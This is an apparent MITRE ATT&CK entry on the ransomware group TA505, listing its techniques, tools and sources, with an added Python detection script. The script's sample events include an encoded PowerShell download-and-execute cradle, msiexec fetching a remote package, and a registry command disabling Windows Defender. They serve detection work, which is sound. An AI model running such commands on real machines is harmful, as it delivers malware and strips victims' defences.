
G0092 TA505

TA505 is a cyber criminal group that has been active since at least 2014. TA505 is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving Clop.[4][5][6][7][1]

Item Value
ID G0092
Associated Names Hive0065, Spandex Tempest, CHIMBORAZO
Version 3.0
Created 28 May 2019
Last Modified 10 April 2024

Associated Group Descriptions

Name Description
Hive0065 [2]
Spandex Tempest [3]
CHIMBORAZO [3]

Techniques Used

Domain ID Name Use
enterprise T1087 Account Discovery -
enterprise T1087.003 Email Account TA505 has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.[8]
enterprise T1583 Acquire Infrastructure -
enterprise T1583.001 Domains TA505 has registered domains to impersonate services such as Dropbox to distribute malware.[1]
enterprise T1071 Application Layer Protocol -
enterprise T1071.001 Web Protocols TA505 has used HTTP to communicate with C2 nodes.[2]
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell TA505 has used PowerShell to download and execute malware and reconnaissance scripts.[4][12][10][11]
enterprise T1059.003 Windows Command Shell TA505 has executed commands using cmd.exe.[8]
enterprise T1059.005 Visual Basic TA505 has used VBS for code execution.[4][5][8][2]
enterprise T1059.007 JavaScript TA505 has used JavaScript for code execution.[4][5]
enterprise T1555 Credentials from Password Stores -
enterprise T1555.003 Credentials from Web Browsers TA505 has used malware to gather credentials from Internet Explorer.[4]
enterprise T1486 Data Encrypted for Impact TA505 has used a wide variety of ransomware, such as Clop, Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment.[4]
enterprise T1140 Deobfuscate/Decode Files or Information TA505 has decrypted packed DLLs with an XOR key.[7]
enterprise T1568 Dynamic Resolution -
enterprise T1568.001 Fast Flux DNS TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs.[8]
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools TA505 has used malware to disable Windows Defender.[1]
enterprise T1105 Ingress Tool Transfer TA505 has downloaded additional malware to execute on victim systems.[10][11][12]
enterprise T1559 Inter-Process Communication -
enterprise T1559.002 Dynamic Data Exchange TA505 has leveraged malicious Word documents that abused DDE.[5]
enterprise T1112 Modify Registry TA505 has used malware to disable Windows Defender through modification of the Registry.[1]
enterprise T1106 Native API TA505 has deployed payloads that use Windows API calls on a compromised host.[1]
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.002 Software Packing TA505 has used UPX to obscure malicious code.[2]
enterprise T1027.010 Command Obfuscation TA505 has used base64 encoded PowerShell commands.[10][11]
enterprise T1027.013 Encrypted/Encoded File TA505 has password-protected malicious Word documents.[4]
enterprise T1588 Obtain Capabilities -
enterprise T1588.001 Malware TA505 has used malware such as Azorult and Cobalt Strike in their operations.[7]
enterprise T1588.002 Tool TA505 has used a variety of tools in their operations, including AdFind, BloodHound, Mimikatz, and PowerSploit.[7]
enterprise T1069 Permission Groups Discovery TA505 has used TinyMet to enumerate members of privileged groups.[2] TA505 has also run net group /domain.[8]
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment TA505 has used spearphishing emails with malicious attachments to initially compromise victims.[4][5][6][10][12][13][8][14][2]
enterprise T1566.002 Spearphishing Link TA505 has sent spearphishing emails containing malicious links.[4][6][8][14]
enterprise T1055 Process Injection -
enterprise T1055.001 Dynamic-link Library Injection TA505 has been seen injecting a DLL into winword.exe.[2]
enterprise T1608 Stage Capabilities -
enterprise T1608.001 Upload Malware TA505 has staged malware on actor-controlled domains.[1]
enterprise T1553 Subvert Trust Controls -
enterprise T1553.002 Code Signing TA505 has signed payloads with code signing certificates from Thawte and Sectigo.[10][11][8]
enterprise T1553.005 Mark-of-the-Web Bypass TA505 has used .iso files to deploy malicious .lnk files.[9]
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.007 Msiexec TA505 has used msiexec to download and execute malicious Windows Installer files.[10][11][8]
enterprise T1218.011 Rundll32 TA505 has leveraged rundll32.exe to execute malicious DLLs.[10][11]
enterprise T1552 Unsecured Credentials -
enterprise T1552.001 Credentials In Files TA505 has used malware to gather credentials from FTP clients and Outlook.[4]
enterprise T1204 User Execution -
enterprise T1204.001 Malicious Link TA505 has used lures to get users to click links in emails and attachments. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files.[4][5][6][10][12][13][8][14]
enterprise T1204.002 Malicious File TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files.[4][5][6][10][12][13][8][14][2]
enterprise T1078 Valid Accounts -
enterprise T1078.002 Domain Accounts TA505 has used stolen domain admin accounts to compromise additional hosts.[2]
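Several of the rows above describe behaviour that is directly observable in process-creation telemetry: base64-encoded PowerShell (T1027.010), PowerShell download cradles (T1059.001, T1105), msiexec fetching a remote installer (T1218.007), rundll32 loading a DLL from a user-writable path (T1218.011), and Windows Defender being switched off through the Registry (T1112, T1562.001), all typically spawned by an Office process after a user enables content (T1204.002). The following Python is an added example of what a detection rule for those rows looks like when run over sample events; it is not code from ATT&CK or from any of the cited reports. The event field names (image, cmdline, parent), the host paths, and the example.invalid URLs are assumptions, and the events themselves are constructed to resemble Sysmon Event ID 1 records rather than taken from real telemetry.

```python
"""Added example: flag process-creation events that match the TA505 tradecraft
listed in the technique table. The events are constructed (Sysmon EID 1-like
fields); the field names, paths and URLs are assumptions, not real telemetry."""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
USER_WRITABLE = re.compile(r"\\(users|programdata|appdata|temp|tmp)\\", re.I)
URL = re.compile(r"https?://\S+", re.I)
CRADLE = re.compile(
    r"\b(downloadstring|downloadfile|invoke-webrequest|iwr|start-bitstransfer)\b", re.I)
DEFENDER_TAMPER = re.compile(
    r"windows defender.*disable(antispyware|realtimemonitoring)"
    r"|set-mppreference.*-disable(realtimemonitoring|ioavprotection)", re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path ('' for an empty path)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload of a powershell.exe command line, or None.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
    The argument is base64 over UTF-16LE text, so it must be base64-decoded and then
    decoded as UTF-16LE; a token that is not valid base64/UTF-16LE yields None.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if t in ("-e", "-ec") or (len(t) >= 3 and "-encodedcommand".startswith(t)):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(event):
    """Return the sorted ATT&CK technique IDs an event matches (empty list if none)."""
    image = basename(event["image"])
    parent = basename(event.get("parent", ""))
    cmd = event["cmdline"]
    hits = set()

    if image in ("powershell.exe", "pwsh.exe"):
        decoded = encoded_command(cmd)
        if decoded is not None:
            hits.update({"T1059.001", "T1027.010"})
            cmd = cmd + " " + decoded          # inspect the decoded script as well
        if CRADLE.search(cmd) and URL.search(cmd):
            hits.update({"T1059.001", "T1105"})
    if image == "msiexec.exe" and URL.search(cmd):
        hits.add("T1218.007")                  # msiexec fetching a remote package
    if image == "rundll32.exe" and USER_WRITABLE.search(cmd):
        hits.add("T1218.011")                  # DLL loaded from a user-writable path
    if DEFENDER_TAMPER.search(cmd):
        hits.update({"T1112", "T1562.001"})    # Defender disabled through the Registry
    if parent in OFFICE_PARENTS and hits:
        hits.add("T1204.002")                  # an Office document spawned the flagged child
    return sorted(hits)


def encode_powershell(script):
    """Build an -EncodedCommand argument the same way powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; hosts, paths and URLs are placeholders.
SAMPLE_EVENTS = {
    "msi_from_word": {
        "image": r"C:\Windows\System32\msiexec.exe",
        "cmdline": r"msiexec.exe /i http://example.invalid/update.msi /q",
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
    "encoded_cradle_from_excel": {
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -nop -w hidden -enc " + encode_powershell(
            "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"),
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
    },
    "rundll32_user_path": {
        "image": r"C:\Windows\System32\rundll32.exe",
        "cmdline": r"rundll32.exe C:\Users\Public\Libraries\update.dll,DllRegisterServer",
        "parent": r"C:\Windows\explorer.exe",
    },
    "defender_off": {
        "image": r"C:\Windows\System32\reg.exe",
        "cmdline": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
        "parent": r"C:\Windows\System32\cmd.exe",
    },
    "benign_admin": {
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -Command Get-Process | Sort-Object CPU",
        "parent": r"C:\Windows\explorer.exe",
    },
}


def run_samples():
    """Analyze every constructed event and map its name to the techniques matched."""
    return {name: analyze(ev) for name, ev in SAMPLE_EVENTS.items()}


if __name__ == "__main__":
    for name, hits in run_samples().items():
        print(f"{name:28s} {', '.join(hits) or '-'}")
```

The decoded script is appended to the command line before the download-cradle check because the interesting strings (DownloadString, the URL) are invisible until the base64/UTF-16LE layer is removed; a rule that only matches on the raw command line misses exactly the variant this row of the table describes. The Office-parent condition is applied last so that it raises the severity of an already-suspicious child rather than flagging every process Word or Excel starts.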

Software

ID Name References Techniques
S0552 AdFind [7] Domain Account:Account Discovery; Domain Trust Discovery; Domain Groups:Permission Groups Discovery; Remote System Discovery; System Network Configuration Discovery
S1025 Amadey [1][17] Web Protocols:Application Layer Protocol; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Data from Local System; Deobfuscate/Decode Files or Information; Fast Flux DNS:Dynamic Resolution; Exfiltration Over C2 Channel; File and Directory Discovery; Ingress Tool Transfer; Modify Registry; Native API; Obfuscated Files or Information; Security Software Discovery:Software Discovery; Mark-of-the-Web Bypass:Subvert Trust Controls; System Information Discovery; System Location Discovery; System Network Configuration Discovery; System Owner/User Discovery
S0344 Azorult [7] Create Process with Token:Access Token Manipulation; Credentials from Web Browsers:Credentials from Password Stores; Deobfuscate/Decode Files or Information; Symmetric Cryptography:Encrypted Channel; File and Directory Discovery; File Deletion:Indicator Removal; Ingress Tool Transfer; Process Discovery; Process Hollowing:Process Injection; Query Registry; Screen Capture; System Information Discovery; System Network Configuration Discovery; System Owner/User Discovery; System Time Discovery; Credentials In Files:Unsecured Credentials
S0521 BloodHound [7] Domain Account:Account Discovery; Local Account:Account Discovery; Archive Collected Data; PowerShell:Command and Scripting Interpreter; Domain Trust Discovery; Group Policy Discovery; Native API; Domain Groups:Permission Groups Discovery; Local Groups:Permission Groups Discovery; Remote System Discovery; System Owner/User Discovery
S0611 Clop [15][16] Windows Command Shell:Command and Scripting Interpreter; Data Encrypted for Impact; Deobfuscate/Decode Files or Information; File and Directory Discovery; Disable or Modify Tools:Impair Defenses; Inhibit System Recovery; Modify Registry; Native API; Network Share Discovery; Software Packing:Obfuscated Files or Information; Process Discovery; Service Stop; Security Software Discovery:Software Discovery; Code Signing:Subvert Trust Controls; Msiexec:System Binary Proxy Execution; System Language Discovery:System Location Discovery; Time Based Checks:Virtualization/Sandbox Evasion
S0154 Cobalt Strike [7] Sudo and Sudo Caching:Abuse Elevation Control Mechanism; Bypass User Account Control:Abuse Elevation Control Mechanism; Parent PID Spoofing:Access Token Manipulation; Token Impersonation/Theft:Access Token Manipulation; Make and Impersonate Token:Access Token Manipulation; Domain Account:Account Discovery; DNS:Application Layer Protocol; Web Protocols:Application Layer Protocol; File Transfer Protocols:Application Layer Protocol; BITS Jobs; Browser Session Hijacking; JavaScript:Command and Scripting Interpreter; Visual Basic:Command and Scripting Interpreter; PowerShell:Command and Scripting Interpreter; Python:Command and Scripting Interpreter; Windows Command Shell:Command and Scripting Interpreter; Windows Service:Create or Modify System Process; Standard Encoding:Data Encoding; Data from Local System; Protocol or Service Impersonation:Data Obfuscation; Data Transfer Size Limits; Deobfuscate/Decode Files or Information; Asymmetric Cryptography:Encrypted Channel; Symmetric Cryptography:Encrypted Channel; Exploitation for Client Execution; Exploitation for Privilege Escalation; File and Directory Discovery; Process Argument Spoofing:Hide Artifacts; Disable or Modify Tools:Impair Defenses; Timestomp:Indicator Removal; Ingress Tool Transfer; Keylogging:Input Capture; Modify Registry; Native API; Network Service Discovery; Network Share Discovery; Non-Application Layer Protocol; Indicator Removal from Tools:Obfuscated Files or Information; Obfuscated Files or Information; Office Template Macros:Office Application Startup; LSASS Memory:OS Credential Dumping; Security Account Manager:OS Credential Dumping; Domain Groups:Permission Groups Discovery; Local Groups:Permission Groups Discovery; Process Discovery; Dynamic-link Library Injection:Process Injection; Process Hollowing:Process Injection; Process Injection; Protocol Tunneling; Domain Fronting:Proxy; Internal Proxy:Proxy; Query Registry; Reflective Code Loading; Remote Desktop Protocol:Remote Services; SSH:Remote Services; Windows Remote Management:Remote Services; SMB/Windows Admin Shares:Remote Services; Distributed Component Object Model:Remote Services; Remote System Discovery; Scheduled Transfer; Screen Capture; Software Discovery; Code Signing:Subvert Trust Controls; Rundll32:System Binary Proxy Execution; System Network Configuration Discovery; System Network Connections Discovery; System Service Discovery; Service Execution:System Services; Pass the Hash:Use Alternate Authentication Material; Domain Accounts:Valid Accounts; Local Accounts:Valid Accounts; Windows Management Instrumentation
S0384 Dridex [4][5][2] Web Protocols:Application Layer Protocol; Browser Session Hijacking; Symmetric Cryptography:Encrypted Channel; Asymmetric Cryptography:Encrypted Channel; DLL:Hijack Execution Flow; Native API; Obfuscated Files or Information; Proxy; Multi-hop Proxy:Proxy; Remote Access Tools; Scheduled Task:Scheduled Task/Job; Software Discovery; Regsvr32:System Binary Proxy Execution; System Information Discovery; Malicious File:User Execution
S0381 FlawedAmmyy [13][8][14] Web Protocols:Application Layer Protocol; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Clipboard Data; Windows Command Shell:Command and Scripting Interpreter; PowerShell:Command and Scripting Interpreter; Data from Local System; Data Obfuscation; Symmetric Cryptography:Encrypted Channel; Exfiltration Over C2 Channel; File Deletion:Indicator Removal; Ingress Tool Transfer; Keylogging:Input Capture; Input Capture; Peripheral Device Discovery; Local Groups:Permission Groups Discovery; Screen Capture; Security Software Discovery:Software Discovery; Rundll32:System Binary Proxy Execution; Msiexec:System Binary Proxy Execution; System Information Discovery; System Owner/User Discovery; Windows Management Instrumentation
S0383 FlawedGrace [6][8][14] Encrypted/Encoded File:Obfuscated Files or Information
S0460 Get2 [14] Web Protocols:Application Layer Protocol; Command and Scripting Interpreter; Process Discovery; Dynamic-link Library Injection:Process Injection; System Information Discovery; System Owner/User Discovery
S0002 Mimikatz [7] SID-History Injection:Access Token Manipulation; Account Manipulation; Security Support Provider:Boot or Logon Autostart Execution; Credentials from Password Stores; Credentials from Web Browsers:Credentials from Password Stores; Windows Credential Manager:Credentials from Password Stores; DCSync:OS Credential Dumping; Security Account Manager:OS Credential Dumping; LSASS Memory:OS Credential Dumping; LSA Secrets:OS Credential Dumping; Rogue Domain Controller; Steal or Forge Authentication Certificates; Golden Ticket:Steal or Forge Kerberos Tickets; Silver Ticket:Steal or Forge Kerberos Tickets; Private Keys:Unsecured Credentials; Pass the Hash:Use Alternate Authentication Material; Pass the Ticket:Use Alternate Authentication Material
S0039 Net [8] Domain Account:Account Discovery; Local Account:Account Discovery; Additional Local or Domain Groups:Account Manipulation; Local Account:Create Account; Domain Account:Create Account; Network Share Connection Removal:Indicator Removal; Network Share Discovery; Password Policy Discovery; Domain Groups:Permission Groups Discovery; Local Groups:Permission Groups Discovery; SMB/Windows Admin Shares:Remote Services; Remote System Discovery; System Network Connections Discovery; System Service Discovery; Service Execution:System Services; System Time Discovery
S0194 PowerSploit [7] Access Token Manipulation; Local Account:Account Discovery; Audio Capture; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Security Support Provider:Boot or Logon Autostart Execution; PowerShell:Command and Scripting Interpreter; Windows Service:Create or Modify System Process; Windows Credential Manager:Credentials from Password Stores; Data from Local System; Domain Trust Discovery; Path Interception by PATH Environment Variable:Hijack Execution Flow; Path Interception by Unquoted Path:Hijack Execution Flow; DLL:Hijack Execution Flow; Path Interception by Search Order Hijacking:Hijack Execution Flow; Keylogging:Input Capture; Indicator Removal from Tools:Obfuscated Files or Information; Command Obfuscation:Obfuscated Files or Information; LSASS Memory:OS Credential Dumping; Process Discovery; Dynamic-link Library Injection:Process Injection; Query Registry; Reflective Code Loading; Scheduled Task:Scheduled Task/Job; Screen Capture; Kerberoasting:Steal or Forge Kerberos Tickets; Credentials in Registry:Unsecured Credentials; Group Policy Preferences:Unsecured Credentials; Windows Management Instrumentation
S0461 SDBbot [14][2] Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Windows Command Shell:Command and Scripting Interpreter; Data from Local System; Deobfuscate/Decode Files or Information; Application Shimming:Event Triggered Execution; Image File Execution Options Injection:Event Triggered Execution; Exfiltration Over C2 Channel; File and Directory Discovery; Indicator Removal; File Deletion:Indicator Removal; Ingress Tool Transfer; Non-Application Layer Protocol; Software Packing:Obfuscated Files or Information; Obfuscated Files or Information; Process Discovery; Dynamic-link Library Injection:Process Injection; Proxy; Remote Desktop Protocol:Remote Services; Rundll32:System Binary Proxy Execution; System Information Discovery; System Location Discovery; System Network Configuration Discovery; System Owner/User Discovery; Video Capture
S0382 ServHelper [6][10][11][8] Additional Local or Domain Groups:Account Manipulation; Web Protocols:Application Layer Protocol; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Windows Command Shell:Command and Scripting Interpreter; PowerShell:Command and Scripting Interpreter; Local Account:Create Account; Asymmetric Cryptography:Encrypted Channel; File Deletion:Indicator Removal; Ingress Tool Transfer; Masquerade Account Name:Masquerading; Remote Desktop Protocol:Remote Services; Scheduled Task:Scheduled Task/Job; Rundll32:System Binary Proxy Execution; System Information Discovery; System Owner/User Discovery
S0266 TrickBot [4][2] Local Account:Account Discovery; Email Account:Account Discovery; Web Protocols:Application Layer Protocol; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Browser Session Hijacking; Credential Stuffing:Brute Force; PowerShell:Command and Scripting Interpreter; Windows Command Shell:Command and Scripting Interpreter; Windows Service:Create or Modify System Process; Password Managers:Credentials from Password Stores; Credentials from Web Browsers:Credentials from Password Stores; Standard Encoding:Data Encoding; Data from Local System; Deobfuscate/Decode Files or Information; Domain Trust Discovery; Symmetric Cryptography:Encrypted Channel; Exfiltration Over C2 Channel; Exploitation of Remote Services; Fallback Channels; File and Directory Discovery; Firmware Corruption; Hidden Window:Hide Artifacts; Disable or Modify Tools:Impair Defenses; Ingress Tool Transfer; Credential API Hooking:Input Capture; Component Object Model:Inter-Process Communication; Masquerading; Modify Registry; Native API; Network Share Discovery; Non-Standard Port; Obfuscated Files or Information; Software Packing:Obfuscated Files or Information; Encrypted/Encoded File:Obfuscated Files or Information; Permission Groups Discovery; Spearphishing Link:Phishing; Spearphishing Attachment:Phishing; Bootkit:Pre-OS Boot; Process Discovery; Process Injection; Process Hollowing:Process Injection; External Proxy:Proxy; Remote Access Tools; VNC:Remote Services; Remote System Discovery; Scheduled Task:Scheduled Task/Job; Code Signing:Subvert Trust Controls; System Information Discovery; System Network Configuration Discovery; System Owner/User Discovery; System Service Discovery; Credentials In Files:Unsecured Credentials; Credentials in Registry:Unsecured Credentials; Malicious File:User Execution; Time Based Checks:Virtualization/Sandbox Evasion

References


  1. Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022. 

  2. Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. 

  3. Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023. 

  4. Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019. 

  5. Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019. 

  6. Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019. 

  7. Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022. 

  8. Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020. 

  9. Trend Micro. (2019, August 27). TA505: Variety in Use of ServHelper and FlawedAmmyy. Retrieved February 22, 2021. 

  10. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019. 

  11. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved September 16, 2024. 

  12. Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019. 

  13. Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019. 

  14. Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020. 

  15. Santos, D. (2021, April 13). Threat Assessment: Clop Ransomware. Retrieved July 30, 2021. 

  16. Cybereason Nocturnus. (2020, December 23). Cybereason vs. Clop Ransomware. Retrieved May 11, 2021. 

  17. Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.